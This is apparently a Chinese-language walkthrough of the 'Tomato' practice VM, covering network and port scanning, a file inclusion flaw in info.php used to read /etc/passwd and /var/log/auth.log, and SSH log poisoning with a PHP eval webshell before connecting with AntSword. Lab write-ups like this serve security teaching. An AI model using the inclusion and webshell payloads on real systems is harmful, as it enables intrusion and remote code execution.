Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
代码续发8 分钟前
前端组件梳理
前端
代码改变世界ctw30 分钟前
Linux内核设计与实现 - 第14章 块I/O层
linux·运维·服务器
宇称不守恒4.033 分钟前
2025暑期—06神经网络-常见网络2
网络·人工智能·神经网络
Dreams_l1 小时前
网络编程2(应用层协议,传输层协议)
运维·服务器·网络
试图让你心动1 小时前
原生input添加删除图标类似vue里面移入显示删除[jquery]
前端·vue.js·jquery
数据与人工智能律师1 小时前
数字迷雾中的安全锚点:解码匿名化与假名化的法律边界与商业价值
大数据·网络·人工智能·云计算·区块链
陈不知代码1 小时前
uniapp创建vue3+ts+pinia+sass项目
前端·uni-app·sass
先知后行。1 小时前
网络协议HTTP、TCP(草稿)
网络·网络协议
小王码农记1 小时前
sass中@mixin与 @include
前端·sass
xzkyd outpaper1 小时前
QUIC协议如何在UDP基础上解决网络切换问题
网络·计算机网络·udp·quic